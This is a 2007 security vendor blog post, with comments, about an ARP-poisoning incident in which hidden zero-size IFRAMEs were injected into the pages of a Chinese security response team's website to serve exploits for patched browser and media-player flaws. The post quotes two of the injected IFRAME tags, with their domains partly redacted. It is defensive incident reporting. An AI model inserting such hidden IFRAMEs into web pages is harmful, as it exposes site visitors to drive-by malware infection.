Computer Security Research - McAfee Avert Labs Blog

Over the last couple of months, we have discussed a few times about how public and commercial web hosting services can be abused to host malware, exploits and send spam.

This week was the “golden week” holiday season in China, and hackers decided that this is a good opportunity to catch administrators off guard. The Chinese Internet Security Response Team (C.I.S.R.T.) announced in their blog on Tuesday, October 2nd, that malicious IFRAMEs were inserted into several of their web pages. McAfee Avert Labs got in touch with C.I.S.R.T. researchers quickly to understand the impact and method of intrusion.

According to C.I.S.R.T.’s own investigations, it was an ARP poisoning attack originating from the web service provider’s network. And you guessed it, the web service engineers are away for the week.

ARP poisoning is a man-in-the-middle style attack that injects malicious code into communication between the gateway and the web servers. On the C.I.S.R.T. website, the following malicious IFRAME links were inserted into existing web pages:

<iframe src=http://mms.n{blocked}mn.com/{blocked}.htm width=0 height=0 frameborder=0></iframe>

In our research, we found at least two vulnerabilities that are being targeted by the obfuscated exploits inserted into the web pages - Exploit-MS06-014 and Exploit-BaoFeng.a. Both vulnerabilities had been patched by their respective vendors, and the latter, affected a popular Chinese media player. A quick check on several other virtual hosts on the same provider, we found at least one more web site that is also injected with malicious links:

<iframe src=http://kiss99.{blocked}.net width=0 height=0></iframe>

ARP poisoning is old school but it can still be deadly when used in a virtual domain hosting environment, allowing an attacker to infect many websites from one gateway as seen in some instances of the HTool-MPack attack, affecting thousands of websites. Zhu Cheng, a colleague and researcher in McAfee Avert Labs, describes how web page code injection is achievable via ARP spoofing in his blog. Trojan tool kits such as NetSniff have these functionalities built-in, making it easy for attackers to perform it. On the hand, it a “noisy” technique and spoofed ARP packets can be easily detected on the wire.

If you had planned to review your website’s security and discuss it with your service provider, now might be good time.

This entry was posted on Thursday, October 4th, 2007 at 6:45 am and is filed under Uncategorized. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Carlyle Says:
October 4th, 2007 at 7:02 pm

Security seems to be the most haunting issue nowadays so far as web hosting service is concerned. Your article is really informative. Thanks.

中国セキュリティ機関のサイト攻撃、Webホスティングサービスを悪用 Says:
October 6th, 2007 at 10:32 pm

[…] McAfeeはC.I.S.R.T.の研究者と協力し、不正侵入の方法などについて調査した[…]

Know Your Enemy - Behind_the_Scenes_of_Malicious_Web_Servers Says:
December 3rd, 2007 at 12:59 am

[…] performs man-in-the-middle attacks, such as ARP spoofing 11, to include the malicious content. In the case of ARP spoofing, the administrator of the web page cannot find any direct evidence of malicious pages on the web site, but users are attacked nevertheless.[…]

استضافة مواقع Says:
December 29th, 2007 at 7:55 am

ARP Spoofing: Is Your Web Hosting Service Protected ?
the web service engineers are away for the week.

ARP Spoofing: Is Your Web Hosting Service Protected ?

4 Responses to “ARP Spoofing: Is Your Web Hosting Service Protected ?”

Leave a Reply

Archives

Categories